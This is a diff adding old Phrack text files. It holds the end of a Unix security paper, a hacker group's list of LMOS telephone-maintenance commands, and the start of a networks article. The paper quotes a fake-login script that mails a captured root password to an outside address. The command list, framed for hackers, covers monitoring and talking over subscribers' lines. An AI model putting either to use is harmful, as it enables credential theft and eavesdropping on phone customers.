+public directory.  The user of system2 would now have access to the password
+file.  Therefore, only a few commands should be allowed to execute remotely.
+Often the only command allowed to run uux is rmail, the restricted mail
+program.
+  The third UUCP system function is the uucico (copy in / copy out) program.
+It performs the true communication work.  Uucp or uux does not actually call
+up other systems; instead they are queued and the uucico program initiates the
+remote processes.  The uucico program uses the file /usr/uucp/USERFILE to
+determine what files a remote system may send or receive.  Checks for legal
+files are the basis for security in USERFILE.  Thus the system administrator
+should carefully control this file.
+  In addition, USERFILE controls security between two Unix systems by allowing
+a call-back flag to be set.  Therefore, some degree of security can be
+achieved by requiring a system to check if the remote system is legal before a
+call-back occurs.
+  The last UUCP function is the uuxqt.  It controls the remote command
+execution.  The uuxqt program uses the file /usr/lib/uucp/L.cmd to determine
+which commands will run in response to a remote execution request.  For
+example, if one wishes to use the electronic mail feature, then the L.cmd file
+will contain the line rmail.  Since uuxqt determines what commands will be
+allowed to execute remotely, commands which may compromise system security
+should not be included in L.cmd.
+
+CALL THE UNIX SYSTEM
+
+In addition to UUCP network commands, one should also be cautious of the cu
+command (call the Unix system).  Cu permits a remote user to call another
+computer system.  The problem with cu is that a user on a system with a weak
+security can use cu to connect to a more secure system and then install a
+Trojan horse on the stronger system.  It is apparent that cu should not be
+used to go from a weaker system to a stronger one, and it is up to the system
+administrator to ensure that this never occurs.
+
+LOCAL AREA NETWORKS
+
+With the increased number of computers operating under the Unix system, some
+consideration must be given to local area networks (LANs).  Because LANs are
+designed to transmit files between computers quickly, security has not been a
+priority with many LANs, but there are secure LANs under development.  It is
+the job of the system manager to investigate security risks when employing
+LANs.
+
+OTHER AREAS OF COMPROMISE
+
+There are numerous methods used by hackers to gain entry into computer
+systems.  In the Unix system, Trojan horses, spoofs and suids are the primary
+weapons used by trespassers.
+  Trojan horses are pieces of code or shell scripts which usually assume the
+role of a common utility but when activated by an unsuspecting user performs
+some unexpected task for the trespasser.  Among the many different Trojan
+horses, it is the su masquerade that is the most dangerous to the Unix system.
+  Recall that the /etc/passwd file is readable to others, and also contains
+information about all users - even root users.  Consider what a hacker could
+do if he were able to read this file and locate a root user with a writable
+directory.  He might easily plant a fake su that would send the root password
+back to the hacker.  A Trojan horse similar to this can often be avoided when
+various security measures are followed, that is, an etc/passwd file with
+limited read access, controlling writable directories, and the PATH variable
+properly set.
+  A spoof is basically a hoax that causes an unsuspecting victim to believe
+that a masquerading computer function is actually a real system operation.  A
+very popular spool in many computer systems is the terminal-login trap.  By
+displaying a phoney login format, a hacker is able to capture the user's
+password.
+  Imagine that a root user has temporarily deserted his terminal.  A hacker
+could quickly install a login process like the one described by Morris and
+Grampp (7):
+
+  echo -n "login:"
+  read X
+  stty -echo
+  echo -n "password:"
+  read Y
+  echo ""
+  stty echo
+  echo %X%Y|mail outside|hacker&
+  sleep 1
+  echo Login incorrect
+  stty 0>/dev/tty
+
+We see that the password of the root user is mailed to the hacker who has
+completely compromised the Unix system.  The fake terminal-login acts as if
+the user has incorrectly entered the password.  It then transfers control over
+to the stty process, thereby leaving no trace of its existence.
+  Prevention of spoofs, like most security hazards, must begin with user
+education.  But an immediate solution to security is sometimes needed before
+education can be effected.  As for terminal-login spoofs, there are some
+keyboard-locking programs that protect the login session while users are away
+from their terminals.  (8, 10) These locked programs ignore keyboard-generated
+interrupts and wait for the user to enter a password to resume the terminal
+session.
+  Since the suid mode has been previously examined in the password section, we
+merely indicate some suid solutions here.  First, suid programs should be used
+is there are no other alternatives.  Unrestrained suids or sgids can lead to
+system compromise.  Second, a "restricted shell" should be given to a process
+that escapes from a suid process to a child process.  The reason for this is
+that a nonprivileged child process might inherit privileged files from its
+parents.  Finally, suid files should be writable only by their owners,
+otherwise others may have access to overwrite the file contents.
+  It can be seen that by applying some basic security principles, a user can
+avoid Trojan horses, spoofs and inappropriate suids.  There are several other
+techniques used by hackers to compromise system security, but the use of good
+judgement and user education may go far in preventing their occurrence.
+
+CONCLUSION
+
+Throughout this paper we have discussed conventional approaches to Unix system
+security by way of practical file management, password protection, and
+networking.  While it can be argued that user education is paramount in
+maintaining Unix system security (11) factors in human error will promote some
+degree of system insecurity.  Advances in protection mechanisms through
+better-written software (12), centralized password control (13) and
+identification devices may result in enhanced Unix system security.
+  The question now asked applies to the future of Unix system operating.  Can
+existing Unix systems accommodate the security requirements of government and
+industry? It appears not, at least for governmental security projects.  By
+following the Orange Book (14), a government graded classification of secure
+computer systems, the Unix system is only as secure as the C1 criterion.  A C1
+system, which has a low security rating (D being the lowest) provides only
+discretionary security protection (DSP) against browsers or non-programmer
+users. Clearly this is insufficient as far as defense or proprietary security
+is concerned.  What is needed are fundamental changes to the Unix security
+system.  This has been recognized by at least three companies, AT&T, Gould and
+Honeywell (15, 16, 17).  Gould, in particular, has made vital changes to the
+kernel and file system in order to produce a C2 rated Unix operating system.
+To achieve this, however, they have had to sacrifice some of the portability
+of the Unix system.  It is hoped that in the near future a Unix system with an
+A1 classification will be realized, though not at the expense of losing its
+valued portability.
+
+REFERENCES
+
+1  Grossman, G R "How secure is 'secure'?" Unix Review Vol 4 no 8 (1986)
+   pp 50-63
+2  Waite, M et al. "Unix system V primer" USA (1984)
+3  Filipski, A and Hanko, J "Making Unix secure" Byte (April 1986) pp 113-128
+4  Kowack, G and Healy, D "Can the holes be plugged?" Computerworld
+   Vol 18 (26 September 1984) pp 27-28
+5  Farrow, R "Security issues and strategies for users" Unix/World
+   (April 1986) pp 65-71
+6  Farrow, R "Security for superusers, or how to break the Unix system"
+   Unix/World (May 1986) pp 65-70
+7  Grampp, F T and Morris, R H "Unix operating system security" AT&T Bell
+   Lab Tech. J. Vol 63 No 8 (1984) pp 1649-1672
+8  Wood, P H and Kochan, S G "Unix system security" USA (1985)
+9  Nowitz, D A "UUCP Implementation description:  Unix programmer's manual
+   Sec. 2" AT&T Bell Laboratories, USA (1984)
+10 Thomas, R "Securing your terminal: two approaches" Unix/World
+   (April 1986) pp 73-76
+11 Karpinski, D "Security round table (Part 1)" Unix Review
+   (October 1984) p 48
+12 Karpinski, D "Security round table (Part 2)" Unix Review
+   (October 1984) p 48
+13 Lobel, J "Foiling the system breakers:  computer security and access
+   control" McGraw-Hill, USA (1986)
+14 National Computer Security Center "Department of Defense trusted
+   computer system evaluation criteria" CSC-STD-001-83, USA (1983)
+15 Stewart, F "Implementing security under Unix" Systems&Software
+   (February 1986)
+16 Schaffer, M and Walsh, G "Lock/ix:  An implementation of Unix for the
+   Lock TCB" Proceedings of USENIX (1988)
+17 Chuck, F "AT&T System 5/MLS Product 14 Strategy" AT&T Bell Labs,
+   Government System Division, USA (August 1987)
+==============================================================================
diff --git a/phrack18/8.txt b/phrack18/8.txt
new file mode 100644
index 0000000..cf114e2
--- /dev/null
+++ b/phrack18/8.txt
@@ -0,0 +1,588 @@
+                               ==Phrack Inc.==
+
+                     Volume Two, Issue 18, Phile #8 of 11
+
+                                  Control C
+
+                                     and
+
+                    The Tribunal of Knowledge presents...
+
+                   LMOS (Loop Maintenance Operation System)
+
+                             -A List of Commands-
+
+    This file contains what to our knowledge are the best things to do on
+LMOS.  We were really vague due to the great power of the information provided
+in this file.  You now know the commands so we will not go into (either in
+this file or when talking to us) how to use this information, it is up to you
+to figure out how to use it.
+
++:  Increase the voice volume on a line
+
++ lets you increase the volume when you are talking on or monitoring a
+sub-scriber's line over a callback path.  The volume is increased because MLT
+adds amplifier to the line.  + may be used after a mon, talk, rev, talkin or
+call request.  Sometimes MLT adds an amplifier automatically to a long line.
+You will not know it is there so if you try to add amplification, a + will
+appear in the status sections but the voices will not get any louder because
+they are already loud as possible.
+
+-:  Decrease the voice volume on a line
+
+- lets you decrease the volume when you are talking on or monitoring a
+subscriber's line over a callback path.  The volume is decreased because MLT
+removes amplifier from the line.  - may be used to remove amplifier that you
+have placed on the line with the + request, or amplifier that MLT has
+automatically places on a long line.  The main reason to remove the amplifier
+is because it can sometimes cause a shrill or howl.
+
+Call:  Make a call on a subscriber's line
+
+Call lets you use your touch-tone pad to dial any number you want using the
+customer's line circuit.  It does this by simulating an off-hook condition in
+order to draw dial tone.  A callback number is a required entry on the tv mask
+and an mdf access is required for calling out (except in SXS and panel
+offices).  You can use a call when:  1) You want to know the TN for a known CA
+& PR - you would call TSPS or ANI.  2) Calls cannot be completed to a TN - you
+would call that TN.  3) To monitor dial tone on a customer's line.
+
+Callrd:  Make a call on a dial pulse line circuit
+
+Callrd lets you use your touch-tone pad to dial using the customer's rotary
+dial line circuit.  MLT does this by translating tones on a customer's line.
+mdf access is required for calling out (except in SXS, DMS10, DMS100, and
+DMS100AC offices).  Use a callrd if you want to know the TN for a known CA &
+PR - you would call TSPS or ANI.
+
+Ccol:  Collect coins using coin relay
+
+Ccol attempts to collect any coins that are in the hopper of a coin telephone
+set by operating the coin relay.  Ccol does not check the totalizer or check
+the rest of the line.  The results tell you only about relay operation, speed,
+and the current that is necessary to operate it.  A ver code is not returned
+by ccol.  You must have access to the line before your request ccol.  You will
+use ccol most often when you are talking to a repair person who is trying to
+fix a coin phone.
+
+Channel:  Run enhanced channel tests on DLC lines
+
+Chan or channel runs channel isolation tests and tells you if you have a bad
+COT or RT channel unit.  Use this request to run enhanced channel tests on
+lines served by digital loop carriers such as SLC Series 5.  Chan can only be
+run if there is special equipment in the co you're testing in.  If you are
+testing a non-locally switched line with the SSA request, channel tests must
+be run separately with this request.  Chan may also be used to run channel
+isolation tests on switched lines from the tv or stv mask, but these tests are
+included when you do a full or loop on a switched line.
+
+Change:  Change status information
+
+Change allows you to change cable, pair or comment information that is
+displayed without having to request a test or any other type of information.
+the permanent line record information is not changed.  To request a change,
+enter "change" in the req field of the tv and enter the change of information.
+
+Chome:  Home totalizer on a coin telephone
+
+Chome attempts to return a totalizer to the starting position (home) for
+counting coins.  The totalizer counts the coins and sends a tone back to the
+co for every 5 cents deposited.  If it is not homed, coins can't be deposited.
+A chome request tells you whether the totalizer was homed, how many tones were
+sent to the co, and the current that was used to home the totalizer.  A line
+must already be accessed to request a chome.  Chome is often used when a
+repair person is trying to fix a coin telephone.
+
+Co:  Test the central office equipment
+
+Co initiates a series of tests on the subscriber's line circuit.  Co can be
+requested using either a no-test or an MDF trunk.  A no-test access connects
+you to the entire loop but a co request tests only the inside portion.  An MDF
+access is only connected to the inside portion of the loop.  The outside
+portion is physically disconnected.  Use a no-test access when you are fairly
+sure the trouble is inside the central office.  Use a co on an MDF access when
+you are not sure where the trouble is.
+
+Coin:  Test a coin telephone set
+
+Coin initiates a full series of tests on a telephone line.  The station set,
+the totalizer, the coin relay, the loop and the co equipment are checked.  If
+the coin request finds something wrong with either the totalizer or the relay,
+it stops testing and tells you the trouble is in the set.  If it finds nothing
+wrong, it runs the full entries of tests.  Coin may be used when a repair
+person is trying to fix a coin telephone.  If a coin phone is newly installed,
+coin will check the set even though there is no line record.
+
+Cret:  Operate coin relay to return coins
+
+Cret attempts to return any coins that may be lodged in the hopper of a coin
+telephone set.  It operates the coin relay so that it will return the coins.
+It tries to return them 3 times before giving up.  If it is successful, it
+also checks the speed of the relay.  It does not check the totalizer or the
+rest of the line.  You should have access to the line before you request a
+cret.  You will use cret primarily when you are talking to a repair person who
+is trying to repair coin telephone.
+
+Cset:  Check totalizer and relay in coinset
+
+Cset checks the totalizer and the coin relay in a coin telephone set.  The
+totalizer is the mechanism in the phone that counts deposited coins and sends
+a tone back to the co for every 5 cents that is deposited.  The relay is the
+mechanism that either returns or collects the coins that are deposited.  Cset
+does not check the co or loop parts of the line.  Cset can be used when you
+are talking to a repair person who is fixing a coin telephone.
+
+Dial:  Test a subscriber's rotary dial
+
+Dial checks the subscriber's rotary dial.  You must be in contact with the
+subscriber,either over a callback path or over a ddd line.  For the dial
+request to work correctly, tell the subscriber to dial a "0" after hearing
+brief dial tone.  The results of a dial request tell you whether the dial is
+okay or not, whether the dial speed is okay and what the speed is, and whether
+the break is okay and what the break is.  Use the dial request when you
+suspect a problem with the telephone set.  The trouble report could be "Can't
+call out' or 'Gets wrong numbers", for example.
+
+Dtout:  Test a pbx line circuit
+
+Dtout initiates a series of tests on a pbx line circuit.  Dtout must be
+requested using an MDF trunk.  It is used to draw dial tone and check the
+arrangement of the pbx line circuit.  Use dtout when you need to check the
+condition of special service circuits that do not use central office switches.
+
+Full:  Test the entire telephone line
+
+Full starts a series of tests that do an extensive analysis of the entire
+line. This includes both the inside and outside portions.  Many individual
+tests are run and the most important results are displayed in the summary
+message. Outside, MLT checks for AC and DC faults.  Inside, it checks the line
+circuit and dial tone.  The results may also include many other types of
+information about the line.  You might request full line test when you first
+access a line or when you need to know a lot about a line.
+
+Grm:  Get fast ground resistance measurement
+
+Grm gives you a quick measurement of the DC resistance of the ground path from
+the strap to the test hardware.  Before you do a grm, have the repair person
+strap the tip and ring wires to ground.  If this isn't done, grm will give you
+incorrect values.  The line must be accessed before you do a grm request.  You
+can use grm when you are talking to a repair person who is fixing a coinset.
+The resistance values obtained from a grm can be compared to old resistance
+values that are stored inside each coinset.
+
+Help:  List the valid tv requests
+
+Help returns a list of all of the valid requests used in MLT-2.  Help can be
+used when you are not sure which request to use in a particular situation, or
+when you can't remember an exact request name.  For example, the correct entry
+to reverse polarity on a touch-tone line is "Rev.", help will tell you this.
+For a description of any specific request, enter the name of the request
+followed by a question mark.
+
+Info:  Get general information about a line
+
+Info gives you the wire center name and the location of the frame; the
+exchange key, MDF group and MDF trunk numbers associated with the subscriber's
+line; the telephone number at the appropriate frame; and the assignment
+telephone number. You can get information about a whole telephone number, an
+NPA-NXX-, or an exchange key.  MLT does not access the line when you request
+info, but it keeps access if you already have it.  If there are multiple
+frames in an office, MLT give you information about all of them.
+
+Keep:  Keep an access that you already have
+
+Keep lets you hold access to a no-test or MDF trunk that is about to
+"timeout."  MLT keeps track of which trunks you have accessed but have not
+used for a while.  MLT will automatically drop the access for you after a
+certain period of time.  About 2 minutes before dropping the access, MLT gives
+you a warning message and also highlights the status line that will be
+dropped.  If you want to keep the access, you should enter "keep" in the req
+field and the tn or line number of the access to be held.  To drop an access
+when your are finished with it, enter an x in the req field.
+
+Lin:  Test the inside part of the loop
+
+Lin starts a series of tests on the inside portion of a line.  Lin includes
+the same tests as the loop test and can identify a co line circuit if one is
+present.  Lin does not do the regular line circuit and draw and break dial
+tone tests.  An MDF access is required for a lin request.  You can use lin to
+test special circuit that do not use co switching machine.  For example, if
+the circuit has 2 loops connected at the frame, lin lets you look at the
+second loop (both full and loop only test toward one loop).
+
+Lloop:  Run the long loop analysis on the outside or loop part of a line
+
+The ll request starts a series of tests which do extensive analysis of the
+outside portion of the subscriber's line.  It is specifically designed to
+handle cases that the regular loop request was not designed to handle.  These
+cases include very long loops (over 100,000 feet) and multiparty lines on
+moderate-to-very-long loops.  It does similar measurements to those that loop
+does, but analyzes the results differently.  It expects to see a loop that has
+no dc faults or only very light dc faults.  If you use a loop on lloop on a
+loop that has serious dc faults it will not do the long loop analysis.
+
+Loc1:  Measure distance to 1-sided resistive fault
+
+Loc1 gets MLT to measure how far a one-sided fault is from the repair person,
+because telephone lines can be very long, it can be difficult for a repair
+person to find the location of a resistive fault.  You can use loc1 to help
+the repair person have 1-sided fault.  You should be in contact with the
+repair person on a line other than the one being measured.  Have the repair
+person open the pr at a ready-access point beyond the fault if possible.  Ask
+him/her to strap the pr tip to ring.  Remember to enter a temperature on the
+tv mask before you transmit the loc1 request.
+
+Loc2:  Measure distance to 2-sided resistive fault
+
+Loc2 gets MLT to measure how far a two-sided fault is from the repair person.
+Remember that you must run a locgp before you run a loc2 and that you must be
+in contact with the repair-person on a line other than the one you will be
+measuring.  The repair-person must connect the bad pair to the good pair in a
+specific way, the exact method to use is explained in the results of the locgp
+request.  Logcp and loc2 can also be used to sectionalize a one-sided
+resistive fault.  Remember to enter a temperature on the tv mask before you
+transmit the loc2 request.
+
+Look:  Look for an intentional fault
+
+Look is used to identify a fault, usually a short or ground, that has been
+placed on the line by the repair person.  Look can be used when a repair
+person is having trouble locating a particular line.  Look gets MLT to monitor
+the line that the repair person is looking for.  When the repair person shorts
+or grounds the line, mlt sends a tone to you over your headset.  You can tell
+the repair person that you "see the short".  A callback path is required for a
+look request.  You should talk to the repair person on a line other than the
+one you are working on.
+
+Lookin:  Look for an intentional fault on a special services line
+
+Lookin is used to identify a fault, usually a short or ground, that has been
+placed on the special services line by the technician.  Lookin is used to
+locate a particular line by having MLT monitor the line that the repair person
+is looking for.  When the repair person shorts or grounds the line, MLT sends
+a tone to you over your headset.  You can tell the repair person that you "See
+the short."  A callback path is required for a lookin quest.  You should talk
+to the repair person on a line other than the one you are working on.  MDF
+access is required.
+
+Loop:  Test the outside part of the loop
+
+Loop starts a series of tests that do an extensive analysis of the outside
+portion of the line.  Loop does every test that full does except the line
+circuit and draw and break dial tone tests.  Loop can be requested using
+either a no-test or an MDF trunk.  A no-test access connects you to the entire
+line but a loop request tests only the outside portion.  An MDF access is only
+connect to the outside portion.  Use a no-test trunk when you are fairly sure
+the trouble is out of the co and an MDF when you are not sure.
+
+Lrm:  Get fast loop resistance measurement
+
+lrm gives you a quick measurement of the DC resistance on a line.  Lrm can't
+be run unless either the receiver is off-hook or the line is strapped tip to
+ring (an intentional short is placed on the line by the repair person).  Also,
+MLT will not accept an lrm request if there is a hard ground on the line.  Lrm
+does not access the line so you must already have access to do an lrm.  You
+can use lrm when you are talking to a repair person who is fixing a coinset.
+The resistance values obtained from the lrm can be compared to the old
+resistance values that are stored inside each coinset.
+
+MDF(#):  Access a specific MDF trunk
+
+MDF(#) lets you choose the MDF trunk that you want MLT to access.  Use this
+request when an MDF trunk is connected to a telephone line at the MDF but is
+not connected to the loop testing system.  This may occur in small offices
+where the frame attendant doesn't work for the entire day.  You can also use
+this request when an MDF trunk has to be tested and repaired.  The MDF entry
+must be a five character entry consisting of the wire center identifier and
+the trunk number.
+
+Mdf:  Access a main distributing frame (MDF)
+
+MDF connects the mlt testing equipment to an MDF trunk.  Before you can enter
+any requests, you must have the frame attendant connect the MDF trunk to the
+subscriber's line.  Remember that MLT automatically accesses a no-test trunk
+unless you specifically request an MDF trunk.  An MDF trunk goes directly from
+the loop testing system to the main distributing frame.  Bypassing the central
+office switch.  Using an MDF trunk allows you to test loops that are connect
+to co equipment that is not MLT-testable.  Also, you can sectionalize a fault
+in or out of the co by testing "in" or "out" using MDF.
+
+MDF(gr):  Access a trunk from a certain mdf trunk group
+
+MDF(gr) lets you choose the MDF trunk group from which MLT will choose an MDF
+trunk.  Use the MDF(gr) request when the NPA-NXX that you are using has more
+than one frame associated with it and you can't enter cable and pair numbers.
+For example, to request MDF trunk group a, you should enter MDFA in the req
+field.  To find out which trunk groups are available for your NPA-NXX you can
+either enter an mdf or an info request.  Remember that you still have to call
+the frame attendant to have the trunk and line connected and also disconnect
+when you are finished.
+
+Mdfin:  Test the inside part of a line
+
+Mdfin starts a series of tests that do an extensive analysis of the inside
+line.  This includes line circuit and dial tone tests.  The mdfin request uses
+a special line that runs from the MLT testing equipment to the MDF.  You must
+ask the frame attendant to connect this line to the subscriber's line.  Then
+you must enter the telephone number of this special line on the test mask
+along with mdfin and the subscriber's number.  For more information see the
+mdfio module in the MLT-2 user guide.
+
+Mdfout:  Test the outside part of a line
+
+Mdfout starts a series of tests that do an extensive analysis of the outside
+line.  This includes the DC and AC tests.  The mdfout request uses a special
+line that runs from the mlt testing equipment to the MDF.  You must ask the
+frame attendant to connect this line to the subscriber's line.  Then you must
+enter the telephone number of this special line on the test mask along with
+mdfin and the subscriber's number.
+
+Mon:  Monitor a subscriber's line
+
+Mon lets you monitor a subscriber's line.  Sometimes you are a better judge of
+whether there is noise, speech, or a recording on a line than MLT is.  If you
+want to listen to a line to determine if one of these conditions does exist,
+use the mon request.  You can also be automatically placed in the monitor mode
+by MLT in some cases.  You will be put in monitor mode if you request ring,
+talk or psr but MLT thinks the line is busy, or if you must talk to the
+subscriber to run a rev, dial, or tt.  A callback number is required.  You can
+request quick, look, or full while in monitor mode.
+
+Psr:  Release a permanent signal
+
+Psr attempts to release a permanent signal in a step-by-step central office.
+A permanent signal is a steady dial tone on a line.  A frequent cause is a
+receiver that is off-hook.  Psr lets you remove the permanent signal so that
+you can monitor for room noise.  If when you monitor the line you still hear
+steady dial tone, you should suspect permanent signal on the line.  Psr
+requires a callback path between your callback line and the subscriber's line.
+You should already have the callback path established before you enter a psr
+request.
+
+Qin:  Run a quick series in toward the co
+
+Qin starts a series of tests that make a "quick" check of the loop toward the
+central office.  It includes the same tests as quick.  It can also identify a
+co line circuit if one is present and will report a line circuit if the DC
+resistances look like one is present.  An MDF access is required for a qin
+request.  You can use qin to test special switching machines.  For example, if
+the circuit has 2 loops connected at the frame, qin lets you look at the 2nd
+loop (both full & loop only test toward one loop).
+
+Rev:  Identify touch-tone polarity reversals
+
+Rev helps you identify a touch-tone polarity reversal.  On a good line, the
+battery is connected to the ring wire and the ground is on the tip wire.
+These wires must be connected to specific terminals on the telephone.  If they
+are reversed, the subscriber will be able to receive calls but will not be
+able to dial out.  If the line is reversed, you won't be able to hear the
+tones before you enter a rev request.  Rev only reserves the line temporarily.
+A callback path should be established before you make a rev request.
+
+Rin:  Ring a subscriber's special services line
+
+Rin lets you ring a telephone on a special services line.  A callback is
+required.  If one doesn't exist, ring in sets one up for you.  To answer the
+callback, answer its ring and press "0" on the touch-tone pad, and listen for
+ringing.  When the subscriber answers, you will be placed in talk mode.  If
+the line is busy, the call in progress will be interrupted.  Use rin to
+contact the subscriber or a technician at the subscriber's home.  MDF access
+is required to request rin.
+
+Ring(#):  Ring a specific party on a multi-party line
+
+Ring(#) lets you choose the telephone that you want to ring on a multiparty
+line.  A multiparty line is one on which more than one subscriber is connected
+to the same pair of wires.  Normally MLT checks the line records of the
+telephone number you enter using the ring request, and automatically rings the
+correct party.  When the line records indicate 2, 4, or 8 party, use the
+ring(#) request and specify the party number in place of the "#."  If you
+request ring1, MLT rings the party connected to the ring side.  If you request
+ring2, MLT rings the party connected on the tip side.
+
+Ring:  Ring a subscriber's line
+
+Ring lets you ring a telephone on a single party line.  A callback path is
+required but if one doesn't exist, ring sets one up for you.  To answer your
+callback, answer its ring and press "0" on the touch-tone pad, and listen for
+ringing.  When the subscriber answers, you will be placed in talk mode.  If
+the line is busy or cannot be rung, you will be placed in monitor mode to
+listen for noise or speech.  Use ring to contact the subscriber or a repair
+person at the subscriber's home.
+
+Ringer:  Check ringer configuration on a line
+
+Ringer counts the number of ringers on each part of the loop (tip-ring,
+tip-ground, and ring-ground).  The results tell you the number of telephones
+found by MLT.  If there is a problem, the summary explains the problem.  If
+you are testing a party line, some of the ringers found may belong to the
+other party.
+
+Rin:  Ring a subscriber's special services line
+
+Rin lets you ring a telephone on a special services line.  A callback is
+required.  If one doesn't exist, ring-in sets one up for you.  To answer the
+callback, answer its ring and press "0" on the touch-tone pad, and listen for
+ringing.  When the subscriber answers, you will be placed in talk mode.  If
+the line is busy the call in progress will be interrupted.  Listen for noise
+of speech.  Use rin to contact the subscriber or a technician at the
+subscriber's home.  MDS is required to request rin.
+
+Soak:  Identify swinging resistance condition
+
+Soak identifies unstable ground faults (swinging resistance) on a line.
+Voltage is applied to the line and a series of DC resistance measurements are
+made to see the effect of that voltage.  If the resistance values are all low,
+the fault is probably stable.  If even one value is 20% larger than the
+original measurement, the fault may be unstable (swinging).  A repair person
+who is dispatched may have trouble locating a swinging fault.  Use soak when
+you find a 10-1000 kohm ground on a q test (full & loop include the soak
+test), or just prior to dispatch to double-check a line's condition.
+
+Ssa:  Special services access
+
+The ssa request is used to access non-locally switched customer telephone
+lines.  Accessing these lines is a  special case of a no-test trunk access.
+However, if they go through a digital loop carrier such as SLC Series 5, and
+there is special equipment available in the co, then you can test them with a
+no-test trunk special se rvices access.  This means you don't have to call the
+trunk.  The request can only be run from the stv mask.
+
+Stv:  Special services trouble verification request
+
+The stv request changes you from a tv mask to an stv mask.  Stv is used when
+you need to test special services circuits (non-locally switched lines) served
+by digital loop carrier systems such as SLC Series 5.  Switching to the stv
+mask will not affect any information you left in the tv mask -- your status
+lines will remain the same; however, the middle section of the mask will be
+changed. Any request done from a tv mask can also be done from an stv mask,
+but not vice versa.  The stv request can only be run from a tv mask.
+
+Take:  Take control of a long-term access
+
+Take is used when you want to transfer a long-term access from someone else's
+terminal to your terminal.  To take control of a no-test access, enter the
+telephone number that you want to transfer in the tn field.  To transfer an
+MDF access to your terminal, enter the NPA-NXX in the tn field and the MDF
+number in the space to the right of the regular tn field of the tv mask.
+Finally, enter take in the req field.  If the previous holder had a callback
+established, it would not be remover.  If necessary, you must remove the
+callback using xcb and request a new callback to your telephone.
+
+Talk:  Talk over the subscriber's line
+
+Talk lets you talk to either a subscriber or a repair person on a subscriber's
+line.  Talk does not ring the line so there must be someone waiting to talk to
+you on the other end of the line.  A callback path is required for the talk
+request but if one does not already exist, talk will set one up for you if you
+have a callback number entered.  If the line is already accessed before the
+talk request, MLT enters a "t" and the last 2 digits of the callback number
+under the callback heading and updates the time since access.  You can request
+quick, loop, or full while in talk mode.
+
+Talkin:  Talk over the subscriber's special services line
+
+Talkin lets you talk to a subscriber or a repair person on a special services
+line.  Talkin does not ring the line so there must be someone waiting to talk
+to you on the other end of the line.  A callback path is required for the
+talkin request but if one does not already exist, talkin sets one up for you
+if you have a callback number entered.  If the line is already accessed before
+the talkin request, MLT enters a "t" and the last 2 digits of the callback
+number under the callback heading and updates the time since access.  You must
+have an MDF access to request talkin.
+
+Tone+:  Use loud tone to help identify a pair
+
+Tone+ puts a high amplitude tone on a line.  It is used on pairs that are very
+long.  The extra amplitude helps the repair-person hear the tone over long
+distances.  Tone is used to help a repair person to locate the correct pair in
+a cable with many pairs of wires in it.  Use tone+ when a repair person
+requests a tone on a very long pair.  If you have a callback on the line, it
+will be placed in monitor mode.  If the status line gets brighter & you get a
+changed state message, it means 1) The repair person found the pr & wants to
+talk to you or 2) The subscriber has gone off-hook.
+
+Tone:  Use tone to help craft identify a pair
+
+Tone puts a metallic tone on a line.  There may be many pairs in a single
+cable, making it difficult for a repair person to locate a specific line.  The
+tone makes this job easier.  Before MLT places a tone on a line it does a
+test.  The results tell you if there is a fault on the line.  If there is a
+callback on the line when you request a tone, it will be placed in monitor
+mode.  If the status line gets brighter and you get a changed state message,
+it means either 1) The repair person found the pr & wants to talk to you or 2)
+The subscriber has gone off-hook.
+
+Toneca:  Use tone to help identify a cable
+
+Toneca puts a longitudinal tone on a line.  This tone helps the repair person
+find the cable binder group that the pair is in.  The repair person finds the
+correct cable by listening for the tone.  Because the tone can be heard on
+pairs other than the one you put it on, when tone or tone+ are inappropriate.
+If the repair person does not have time to find the cable on the first try,
+you can repeat the request.  Before placing the tone on the line, MLT does a
+pretest and tells you if there is a fault on the line.
+
+Tonein:  Use tone to help a technician identify a special services pair
+
+Tonein puts a metallic tone on a special services line.  It may be difficult
+for a technician to locate a specific line.  The tone makes this job easier.
+Before MLT places a tone on a line it does a pretest.  An MDF access is
+required in order to request a tonein.  If a callback is on the line when you
+request tonein, it is placed in monitor mode.  If the status line gets
+brighter and you get a changed state message, it means either 1) The repair
+person found the pr & wants to talk to you or, 2) The subscriber has gone
+off-hook.
+
+Tt:  Test the subscriber's touch-tone pad
+
+Tt checks a subscriber's touch-tone pad.  It analyzes the tones produced when
+the subscriber presses the button before you make a tt request.  You in the
+sequence 1 through 0.  You must instruct the subscriber to press the buttons
+after hearing dial tone.  Mlt will signal you over your headset with two beeps
+if the pad is good or one or no beeps if it is bad.  A callback path should be
+established before you make a tt request.  You must use a no-test trunk access
+to request it.  You can use the ring request to contact the subscriber and set
+up a callback.
+
+Tv:  Trouble verification request
+
+The tv request changes you from an stv mask to a tv mask.  Tv is used when you
+need to do interactive testing of locally switched telephone lines, or tests
+using an MDF trunk.  Switching to the tv mask will not affect any information
+you left in the stv mask -- your status lines will remain the same; however,
+the middle section of the mask will be changed.  Any request done from a tv
+mask can also be done from an stv mask, but not vice versa.  The request can
+only be run from a stv mask.
+
+Ver##:  Get definition and example of a ver code
+
+Ver## gives you a description of the ver code that you type in place of the
+##.  For example, a ver22 request will give you a definition of verification
+code number 22 and an example of a typical set of test results that might
+accompany a ver code of 22.  Use this request whenever you can't remember what
+a certain ver code means.  MLT stores your tv mask when you request ver code
+information.
+
+Ver:  Test the entire telephone line
+
+Ver starts a series of tests that do an extensive analysis of the entire line.
+This includes both the inside and outside portions.  Many individual tests are
+run but only the ver code and summary messages are displayed.  Outside, MLT
+checks for AC and DC faults.  Inside, it checks the line circuit and dial
+tone.
+
+               Thanks to AT&T and the Bell Operating Companies.
+
+                   Control C and The Tribunal of Knowledge
+
+                If you have any questions or comments contact:
+
+                                  Control C
+                                  Jack Death
+                                Prime Suspect
+                                 The Prophet
+                                  The Urvile
+
+                       Or any other member of the TOK.
+==============================================================================
diff --git a/phrack18/9.txt b/phrack18/9.txt
new file mode 100644
index 0000000..18116c1
--- /dev/null
+++ b/phrack18/9.txt
@@ -0,0 +1,313 @@
+                               ==Phrack Inc.==
+
+                     Volume Two, Issue 18, Phile #9 of 11
+
+                     The Tribunal of Knowledge presents..
+
+                          A Few Things About Networks
+                          ===========================
+
+                    Brought to you by  Prime Suspect (TOK)
+
+                                June 1,  1988
+
+
+   Seems like if you're into hacking you sometime or  another run into  using
+networks,  whether it  be Telenet, Tymnet,  or one of the  Wide Area Networks.
+One  popular Network that hackers have used for some time is Arpanet.  Arpanet
+has been  around for quite a  long time.  There are changes made  to it almost
+daily and  the uses  of it are much more than just logging into other systems.
+Many  college  students find themselves getting acquainted  with  Bitnet these
+days.  Bitnet  is SO  new compared  to other  networks that it's  got a lot of
+potential left.  There is  much more  to it then just mail and file transfers.
+There are  interactive uses such as the  RELAY for real-time  discussion  with
